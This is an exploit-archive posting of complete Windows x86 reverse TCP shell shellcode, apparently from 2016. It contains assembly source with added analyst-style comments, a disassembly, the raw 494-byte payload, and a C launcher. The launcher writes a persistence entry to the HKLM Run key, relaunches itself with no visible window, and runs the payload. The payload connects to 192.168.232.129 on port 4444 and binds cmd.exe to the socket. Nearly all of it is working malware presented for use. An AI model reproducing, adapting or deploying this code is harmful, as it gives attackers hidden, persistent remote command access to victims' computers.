
Windows x86 Persistent Reverse TCP Shell Shellcode

Windows x86 Persistent Reverse TCP Shell Shellcode
Posted Sep 5, 2016
Authored by Roziul Hasan Khan Shifat

494 bytes small Microsoft Windows x86 persistent reverse TCP shell shellcode.

tags | shell, x86, tcp, shellcode
systems | windows
SHA-256 | f1db1ccdf479bf8278928587366ee7659410bf15a550926abfde9e17e284ac35

Windows x86 Persistent Reverse TCP Shell Shellcode

/*
# Title : Windows x86 persistent reverse shell tcp
# Author : Roziul Hasan Khan Shifat
# Date : 04-09-2016
# Tested on : Windows 7 x86
*/


/*
Note : This program must be run as administrator the first time; otherwise it will not be persistent (the Run value is written under HKEY_LOCAL_MACHINE).
*/


/*
section .text
global _start
_start:

;-----------------------------------------------------------------------
; Windows x86 reverse-shell payload (NASM, Intel syntax, 32-bit, stdcall).
; Analyst walk-through: the code has no imports. It locates kernel32.dll
; through the PEB loader list, scans kernel32's export-name table for
; GetProcAddress, then builds every further API name on the stack and
; resolves it by address.
; Hard-coded network indicators: TCP port 4444, IPv4 192.168.232.129.
; Observable behaviour: loads ws2_32.dll, calls WSAConnect in a loop until
; it succeeds, then starts cmd.exe with all three standard handles set to
; the socket and calls ExitProcess with CreateProcessA's return value.
; Register roles: ecx = kernel32 base during resolution; esi = stack table
; of resolved function pointers; edi = kernel32 base, then ws2_32 base,
; then the SOCKET; ebx = export directory, then &sockaddr_in.
;-----------------------------------------------------------------------

xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB (TEB+0x30)
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
lodsd ;eax = 2nd entry
xchg esi,eax
lodsd ;eax = 3rd entry
mov ecx,[eax+0x10] ;3rd entry's DllBase -> kernel32.dll; relies on the
                   ;exe, ntdll, kernel32 load order of the tested Win7 build


mov ebx,[ecx+0x3c] ;IMAGE_DOS_HEADER.e_lfanew
add ebx,ecx ;IMAGE_NT_HEADERS
mov ebx,[ebx+0x78] ;DataDirectory[0].VirtualAddress (export table RVA)
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY

mov esi,[ebx+0x20] ;AddressOfNames (RVA)
add esi,ecx ;esi = first name-RVA slot


xor edx,edx ;edx = number of names read so far

g:
; Scan the export names until one starts with the 12 bytes "GetProcAddre".

inc edx
lodsd ;eax = next name RVA
add eax,ecx ;eax = name string
cmp dword [eax],'GetP'
jne g
cmp dword [eax+4],'rocA'
jne g
cmp dword [eax+8],'ddre'
jne g

mov esi,[ebx+0x1c] ;AddressOfFunctions (RVA)
add esi,ecx


; NOTE(review): edx is the 1-based position of the matched name and is used
; directly as the AddressOfFunctions index; AddressOfNameOrdinals is never
; consulted, so this resolves correctly only where kernel32's ordinal layout
; happens to line up -- confirm against the tested build.
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()

xor eax,eax
push eax ;zero dword; also leaves ax = 0 for the NUL-padding store below

sub esp,24 ;28-byte scratch table for resolved function pointers

lea esi,[esp] ;esi = table base. Slots: 0 GetProcAddress, 4 CreateProcessA,
              ;8 ExitProcess, 12 WSAStartup, 16 WSASocketA, 20 WSAConnect

mov [esi],dword edx ;GetProcAddress() at offset 0
mov edi,ecx ;kernel32.dll

;------------------------------
;finding address of CreateProcessA()
; Each API name is pushed as little-endian dword immediates and the
; padding bytes are overwritten with zero to NUL-terminate it.

push 0x42424173 ;"sABB"
mov [esp+2],word ax ;-> "sA\0\0"
push 0x7365636f ;"oces"
push 0x72506574 ;"tePr"
push 0x61657243 ;"Crea"

lea eax,[esp] ;eax = "CreateProcessA"

push eax ;lpProcName
push ecx ;hModule = kernel32

call edx ;GetProcAddress (stdcall: the callee pops both arguments)
;----------------------------
add esp,16 ;discard the 16-byte name buffer

mov [esi+4],dword eax ;CreateProcessA() at offset 4
;-----------------------------
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365 ;"essA"
mov [esp+3],byte cl ;-> "ess\0"
push 0x636f7250 ;"Proc"
push 0x74697845 ;"Exit"

lea ecx,[esp] ;ecx = "ExitProcess"

push ecx ;lpProcName
push edi ;hModule = kernel32

call dword [esi] ;GetProcAddress

add esp,12 ;discard the 12-byte name buffer

mov [esi+8],dword eax ;ExitProcess() at offset 8
;-----------------------------------------------------
;loading ws2_32.dll


xor ecx,ecx
push ecx ;zero dword after the name
push 0x41797261 ;"aryA"
push 0x7262694c ;"Libr"
push 0x64616f4c ;"Load"

lea ecx,[esp] ;ecx = "LoadLibraryA"

push ecx ;lpProcName
push edi ;hModule = kernel32

call dword [esi] ;GetProcAddress -> eax = LoadLibraryA

add esp,12 ;discard the name; the zero dword pushed above stays on the stack

xor ecx,ecx
push 0x41416c6c ;"llAA"
mov [esp+2],word cx ;-> "ll\0\0"
push 0x642e3233 ;"32.d"
push 0x5f327377 ;"ws2_"
lea ecx,[esp] ;ecx = "ws2_32.dll"

push ecx ;lpLibFileName
call eax ;LoadLibraryA: first externally visible step (ws2_32.dll image load)
add esp,8 ;only 8 of the 12 name bytes are discarded; the rest stay on the stack

mov edi,eax ;ws2_32.dll base (edi no longer holds kernel32)

;-----------------------------------
;finding address of WSAStartup()
xor ecx,ecx
push 0x41417075 ;"upAA"
mov [esp+2],word cx ;-> "up\0\0"
push 0x74726174 ;"tart"
push 0x53415357 ;"WSAS"

lea ecx,[esp] ;ecx = "WSAStartup"
push ecx ;lpProcName
push eax ;hModule = ws2_32 (eax still holds the LoadLibraryA result)

call dword [esi] ;GetProcAddress
add esp,12

mov [esi+12],dword eax ;WSAStartup() at offset 12

;------------------------------------------
;finding address of WSASocketA()

xor ecx,ecx
push 0x42424174 ;"tABB"
mov [esp+2],word cx ;-> "tA\0\0"
push 0x656b636f ;"ocke"
push 0x53415357 ;"WSAS"

lea ecx,[esp] ;ecx = "WSASocketA"

push ecx ;lpProcName
push edi ;hModule = ws2_32

call dword [esi] ;GetProcAddress
add esp,12

mov [esi+16],dword eax ;WSASocketA() at offset 16
;-----------------------------
;finding address of WSAConnect()
xor ecx,ecx
push 0x41417463 ;"ctAA"
mov [esp+2],word cx ;-> "ct\0\0"
push 0x656e6e6f ;"onne"
push 0x43415357 ;"WSAC"

lea ecx,[esp] ;ecx = "WSAConnect"

push ecx ;lpProcName
push edi ;hModule = ws2_32

call dword [esi] ;GetProcAddress
add esp,12

mov [esi+20],dword eax ;WSAConnect() at offset 20
;------------------------------------------------

;WSAStartup(514, &WSADATA)

xor ecx,ecx
push ecx
mov cx,400 ;sizeof(WSADATA) is 400 bytes on 32-bit Windows

sub esp,ecx ;reserve the WSADATA buffer on the stack

lea ecx,[esp] ;ecx = &WSADATA

xor ebx,ebx
mov bx,514 ;wVersionRequested = 0x0202 (Winsock 2.2)

push ecx ;lpWSAData
push ebx ;wVersionRequested

call dword [esi+12] ;WSAStartup (return value is not checked)

;-------------------------------

;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)

xor ecx,ecx
push ecx ;dwFlags = 0
push ecx ;g = 0
push ecx ;lpProtocolInfo = NULL

mov cl,6
push ecx ;protocol = IPPROTO_TCP (6)

sub ecx,5
push ecx ;type = SOCK_STREAM (1)

inc ecx
push ecx ;af = AF_INET (2)

call dword [esi+16] ;WSASocketA (INVALID_SOCKET is not checked)

xchg edi,eax ;SOCKET

;--------------------------------------------------
;WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL)
; Build a 16-byte sockaddr_in on the stack. Port and address are fixed
; constants, so they are reliable static indicators for this sample.
xor ecx,ecx
push ecx
push ecx
push ecx
push ecx ;16 zero bytes = sizeof(sockaddr_in)

mov [esp],byte 2 ;sin_family = AF_INET
mov [esp+2],word 0x5c11 ;sin_port in network byte order: bytes 11 5c = TCP 4444
mov [esp+4],dword 0x81e8a8c0 ;sin_addr: bytes c0 a8 e8 81 = 192.168.232.129

connect:
; Retry loop: WSAConnect is re-issued until it returns 0. There is no
; delay and no attempt limit between retries.
xor ecx,ecx
lea ebx,[esp] ;ebx = &sockaddr_in (reused later as lpProcessInformation)

push ecx ;lpGQOS = NULL
push ecx ;lpSQOS = NULL
push ecx ;lpCalleeData = NULL
push ecx ;lpCallerData = NULL


mov cl,16


push ecx ;namelen = sizeof(sockaddr_in)
push ebx ;name
push edi ;s = SOCKET

call dword [esi+20] ;WSAConnect (stdcall: arguments popped by the callee)
xor ecx,ecx

cmp eax,ecx
jnz connect ;nonzero = SOCKET_ERROR -> try again
;----------------------------------------------

xor ecx,ecx

sub esp,16 ;16 bytes reserved here are never referenced: edx is
lea edx,[esp] ;reassigned below, and the call passes ebx (the now idle
              ;sockaddr_in buffer) as lpProcessInformation

; STARTUPINFOA (68 bytes), pushed last field first.
push edi ;hStdError  = SOCKET
push edi ;hStdOutput = SOCKET
push edi ;hStdInput  = SOCKET -> the shell's I/O is the network socket
push ecx ;lpReserved2 = NULL
push word cx ;cbReserved2 = 0
push word cx ;wShowWindow = 0

mov cl,255
inc ecx ;ecx = 0x100

push ecx ;dwFlags = STARTF_USESTDHANDLES (0x100)
xor ecx,ecx

push ecx ;dwFillAttribute
push ecx ;dwYCountChars
push ecx ;dwXCountChars
push ecx ;dwYSize
push ecx ;dwXSize
push ecx ;dwY
push ecx ;dwX
push ecx ;lpTitle
push ecx ;lpDesktop
push ecx ;lpReserved

mov cl,68

push ecx ;cb = sizeof(STARTUPINFOA) = 68

lea ecx,[esp] ;ecx = &STARTUPINFOA


xor edx,edx
push 0x41657865 ;"exeA"
mov [esp+3],byte dl ;-> "exe\0"
push 0x2e646d63 ;"cmd."

lea edx,[esp] ;edx = "cmd.exe"
;-----------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&startup_info,&process_info)

push ebx ;lpProcessInformation (the 16-byte sockaddr_in buffer)
push ecx ;lpStartupInfo

xor ecx,ecx

push ecx ;lpCurrentDirectory = NULL
push ecx ;lpEnvironment = NULL
push ecx ;dwCreationFlags = 0

inc ecx
push ecx ;bInheritHandles = TRUE (needed for the socket handles in STARTUPINFO)
xor ecx,ecx

push ecx ;lpThreadAttributes = NULL
push ecx ;lpProcessAttributes = NULL
push edx ;lpCommandLine = "cmd.exe"
push ecx ;lpApplicationName = NULL

call dword [esi+4] ;CreateProcessA

push eax ;uExitCode = CreateProcessA's BOOL result
call dword [esi+8] ;ExitProcess: this process ends here; the child cmd.exe
                   ;holds the inherited socket
*/


/*
Disassembly of section .text:

00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 8b 59 3c mov 0x3c(%ecx),%ebx
15: 01 cb add %ecx,%ebx
17: 8b 5b 78 mov 0x78(%ebx),%ebx
1a: 01 cb add %ecx,%ebx
1c: 8b 73 20 mov 0x20(%ebx),%esi
1f: 01 ce add %ecx,%esi
21: 31 d2 xor %edx,%edx

00000023 <g>:
23: 42 inc %edx
24: ad lods %ds:(%esi),%eax
25: 01 c8 add %ecx,%eax
27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2d: 75 f4 jne 23 <g>
2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
36: 75 eb jne 23 <g>
38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
3f: 75 e2 jne 23 <g>
41: 8b 73 1c mov 0x1c(%ebx),%esi
44: 01 ce add %ecx,%esi
46: 8b 14 96 mov (%esi,%edx,4),%edx
49: 01 ca add %ecx,%edx
4b: 31 c0 xor %eax,%eax
4d: 50 push %eax
4e: 83 ec 18 sub $0x18,%esp
51: 8d 34 24 lea (%esp),%esi
54: 89 16 mov %edx,(%esi)
56: 89 cf mov %ecx,%edi
58: 68 73 41 42 42 push $0x42424173
5d: 66 89 44 24 02 mov %ax,0x2(%esp)
62: 68 6f 63 65 73 push $0x7365636f
67: 68 74 65 50 72 push $0x72506574
6c: 68 43 72 65 61 push $0x61657243
71: 8d 04 24 lea (%esp),%eax
74: 50 push %eax
75: 51 push %ecx
76: ff d2 call *%edx
78: 83 c4 10 add $0x10,%esp
7b: 89 46 04 mov %eax,0x4(%esi)
7e: 31 c9 xor %ecx,%ecx
80: 68 65 73 73 41 push $0x41737365
85: 88 4c 24 03 mov %cl,0x3(%esp)
89: 68 50 72 6f 63 push $0x636f7250
8e: 68 45 78 69 74 push $0x74697845
93: 8d 0c 24 lea (%esp),%ecx
96: 51 push %ecx
97: 57 push %edi
98: ff 16 call *(%esi)
9a: 83 c4 0c add $0xc,%esp
9d: 89 46 08 mov %eax,0x8(%esi)
a0: 31 c9 xor %ecx,%ecx
a2: 51 push %ecx
a3: 68 61 72 79 41 push $0x41797261
a8: 68 4c 69 62 72 push $0x7262694c
ad: 68 4c 6f 61 64 push $0x64616f4c
b2: 8d 0c 24 lea (%esp),%ecx
b5: 51 push %ecx
b6: 57 push %edi
b7: ff 16 call *(%esi)
b9: 83 c4 0c add $0xc,%esp
bc: 31 c9 xor %ecx,%ecx
be: 68 6c 6c 41 41 push $0x41416c6c
c3: 66 89 4c 24 02 mov %cx,0x2(%esp)
c8: 68 33 32 2e 64 push $0x642e3233
cd: 68 77 73 32 5f push $0x5f327377
d2: 8d 0c 24 lea (%esp),%ecx
d5: 51 push %ecx
d6: ff d0 call *%eax
d8: 83 c4 08 add $0x8,%esp
db: 89 c7 mov %eax,%edi
dd: 31 c9 xor %ecx,%ecx
df: 68 75 70 41 41 push $0x41417075
e4: 66 89 4c 24 02 mov %cx,0x2(%esp)
e9: 68 74 61 72 74 push $0x74726174
ee: 68 57 53 41 53 push $0x53415357
f3: 8d 0c 24 lea (%esp),%ecx
f6: 51 push %ecx
f7: 50 push %eax
f8: ff 16 call *(%esi)
fa: 83 c4 0c add $0xc,%esp
fd: 89 46 0c mov %eax,0xc(%esi)
100: 31 c9 xor %ecx,%ecx
102: 68 74 41 42 42 push $0x42424174
107: 66 89 4c 24 02 mov %cx,0x2(%esp)
10c: 68 6f 63 6b 65 push $0x656b636f
111: 68 57 53 41 53 push $0x53415357
116: 8d 0c 24 lea (%esp),%ecx
119: 51 push %ecx
11a: 57 push %edi
11b: ff 16 call *(%esi)
11d: 83 c4 0c add $0xc,%esp
120: 89 46 10 mov %eax,0x10(%esi)
123: 31 c9 xor %ecx,%ecx
125: 68 63 74 41 41 push $0x41417463
12a: 66 89 4c 24 02 mov %cx,0x2(%esp)
12f: 68 6f 6e 6e 65 push $0x656e6e6f
134: 68 57 53 41 43 push $0x43415357
139: 8d 0c 24 lea (%esp),%ecx
13c: 51 push %ecx
13d: 57 push %edi
13e: ff 16 call *(%esi)
140: 83 c4 0c add $0xc,%esp
143: 89 46 14 mov %eax,0x14(%esi)
146: 31 c9 xor %ecx,%ecx
148: 51 push %ecx
149: 66 b9 90 01 mov $0x190,%cx
14d: 29 cc sub %ecx,%esp
14f: 8d 0c 24 lea (%esp),%ecx
152: 31 db xor %ebx,%ebx
154: 66 bb 02 02 mov $0x202,%bx
158: 51 push %ecx
159: 53 push %ebx
15a: ff 56 0c call *0xc(%esi)
15d: 31 c9 xor %ecx,%ecx
15f: 51 push %ecx
160: 51 push %ecx
161: 51 push %ecx
162: b1 06 mov $0x6,%cl
164: 51 push %ecx
165: 83 e9 05 sub $0x5,%ecx
168: 51 push %ecx
169: 41 inc %ecx
16a: 51 push %ecx
16b: ff 56 10 call *0x10(%esi)
16e: 97 xchg %eax,%edi
16f: 31 c9 xor %ecx,%ecx
171: 51 push %ecx
172: 51 push %ecx
173: 51 push %ecx
174: 51 push %ecx
175: c6 04 24 02 movb $0x2,(%esp)
179: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%esp)
180: c7 44 24 04 c0 a8 e8 movl $0x81e8a8c0,0x4(%esp)
187: 81

00000188 <connect>:
188: 31 c9 xor %ecx,%ecx
18a: 8d 1c 24 lea (%esp),%ebx
18d: 51 push %ecx
18e: 51 push %ecx
18f: 51 push %ecx
190: 51 push %ecx
191: b1 10 mov $0x10,%cl
193: 51 push %ecx
194: 53 push %ebx
195: 57 push %edi
196: ff 56 14 call *0x14(%esi)
199: 31 c9 xor %ecx,%ecx
19b: 39 c8 cmp %ecx,%eax
19d: 75 e9 jne 188 <connect>
19f: 31 c9 xor %ecx,%ecx
1a1: 83 ec 10 sub $0x10,%esp
1a4: 8d 14 24 lea (%esp),%edx
1a7: 57 push %edi
1a8: 57 push %edi
1a9: 57 push %edi
1aa: 51 push %ecx
1ab: 66 51 push %cx
1ad: 66 51 push %cx
1af: b1 ff mov $0xff,%cl
1b1: 41 inc %ecx
1b2: 51 push %ecx
1b3: 31 c9 xor %ecx,%ecx
1b5: 51 push %ecx
1b6: 51 push %ecx
1b7: 51 push %ecx
1b8: 51 push %ecx
1b9: 51 push %ecx
1ba: 51 push %ecx
1bb: 51 push %ecx
1bc: 51 push %ecx
1bd: 51 push %ecx
1be: 51 push %ecx
1bf: b1 44 mov $0x44,%cl
1c1: 51 push %ecx
1c2: 8d 0c 24 lea (%esp),%ecx
1c5: 31 d2 xor %edx,%edx
1c7: 68 65 78 65 41 push $0x41657865
1cc: 88 54 24 03 mov %dl,0x3(%esp)
1d0: 68 63 6d 64 2e push $0x2e646d63
1d5: 8d 14 24 lea (%esp),%edx
1d8: 53 push %ebx
1d9: 51 push %ecx
1da: 31 c9 xor %ecx,%ecx
1dc: 51 push %ecx
1dd: 51 push %ecx
1de: 51 push %ecx
1df: 41 inc %ecx
1e0: 51 push %ecx
1e1: 31 c9 xor %ecx,%ecx
1e3: 51 push %ecx
1e4: 51 push %ecx
1e5: 52 push %edx
1e6: 51 push %ecx
1e7: ff 56 04 call *0x4(%esi)
1ea: 50 push %eax
1eb: ff 56 08 call *0x8(%esi)
*/


#include<stdio.h>
#include<windows.h>
#include<string.h>

/* 494-byte x86 payload, byte-for-byte the objdump listing above. For
   static matching, the hard-coded endpoint lives in the sockaddr_in
   build near the end: "\x11\x5c" (port 4444) and "\xc0\xa8\xe8\x81"
   (192.168.232.129). The array is writable data, not code; see the
   note at the call site in main(). */
char shellcode[]=\

"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xc0\x50\x83\xec\x18\x8d\x34\x24\x89\x16\x89\xcf\x68\x73\x41\x42\x42\x66\x89\x44\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x04\x24\x50\x51\xff\xd2\x83\xc4\x10\x89\x46\x04\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x08\x89\xc7\x31\xc9\x68\x75\x70\x41\x41\x66\x89\x4c\x24\x02\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x50\xff\x16\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x68\x74\x41\x42\x42\x66\x89\x4c\x24\x02\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x10\x31\xc9\x68\x63\x74\x41\x41\x66\x89\x4c\x24\x02\x68\x6f\x6e\x6e\x65\x68\x57\x53\x41\x43\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x14\x31\xc9\x51\x66\xb9\x90\x01\x29\xcc\x8d\x0c\x24\x31\xdb\x66\xbb\x02\x02\x51\x53\xff\x56\x0c\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x10\x97\x31\xc9\x51\x51\x51\x51\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\xe8\x81\x31\xc9\x8d\x1c\x24\x51\x51\x51\x51\xb1\x10\x51\x53\x57\xff\x56\x14\x31\xc9\x39\xc8\x75\xe9\x31\xc9\x83\xec\x10\x8d\x14\x24\x57\x57\x57\x51\x66\x51\x66\x51\xb1\xff\x41\x51\x31\xc9\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\xb1\x44\x51\x8d\x0c\x24\x31\xd2\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x14\x24\x53\x51\x31\xc9\x51\x51\x51\x41\x51\x31\xc9\x51\x51\x52\x51\xff\x56\x04\x50\xff\x56\x08";

/*
 * Launcher for the payload above.
 *
 * Behaviour as written:
 *   1. Opens HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (the reason
 *      for the "run as administrator first" note) and writes the value
 *      "reverse_shell_tcp" = argv[0], so the same executable is started
 *      again at each logon. The value name and the Run-key location are
 *      the persistence artifacts to look for.
 *   2. With no argument (argc == 1) it relaunches itself hidden through
 *      ShellExecute with the single argument "78"; when started with 78 it
 *      jumps into the shellcode array. A process spawning a copy of itself
 *      with a bare "78" argument is the runtime tell.
 *
 * Returns 0 on every path except the shellcode path, which does not return
 * because the payload ends in ExitProcess.
 */
int main(int li,char *a[])
{
char info[200]; /* receives the existing Run value, if any */
DWORD l;        /* lpcbData for RegQueryValueExA; never initialised, so the
                   query is handed an indeterminate buffer size */
HKEY i;         /* Run key handle; RegOpenKeyA's return value is not checked,
                   so i is only meaningful when that call succeeded */


RegOpenKeyA(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&i);
int r= RegQueryValueExA(i,"reverse_shell_tcp",0,NULL,(LPBYTE)info,&l);

/* The condition tests the handle, not r: r is never read, so whenever the
   key opened the value is (re)written regardless of whether it already
   existed. */
if(i!=0)
{
RegSetValueExA(i,"reverse_shell_tcp",0,REG_SZ,a[0],strlen(a[0]));
RegCloseKey(i);
}
else
RegCloseKey(i);




int mode; /* 1 = relaunch self hidden; 78 = execute the payload */



if(li==1)
mode=1;
else
mode=atoi(a[1]); /* a non-numeric argument yields 0 and takes the default branch */

switch(mode)
{



case 78:
/* Calls into the shellcode global directly. That memory is ordinary
   initialised data; under DEP/NX this call faults unless the image was
   built with an executable data section -- verify the build settings. */
(* (int(*)())shellcode )();
break;

case 1:
default:
/* Re-execute this same binary (argv[0]) with "78"; nShowCmd 0 is SW_HIDE,
   so the child runs without a visible window while the parent returns. */
ShellExecute(NULL,NULL,a[0],"78",NULL,0);
break;
}


return 0;

}
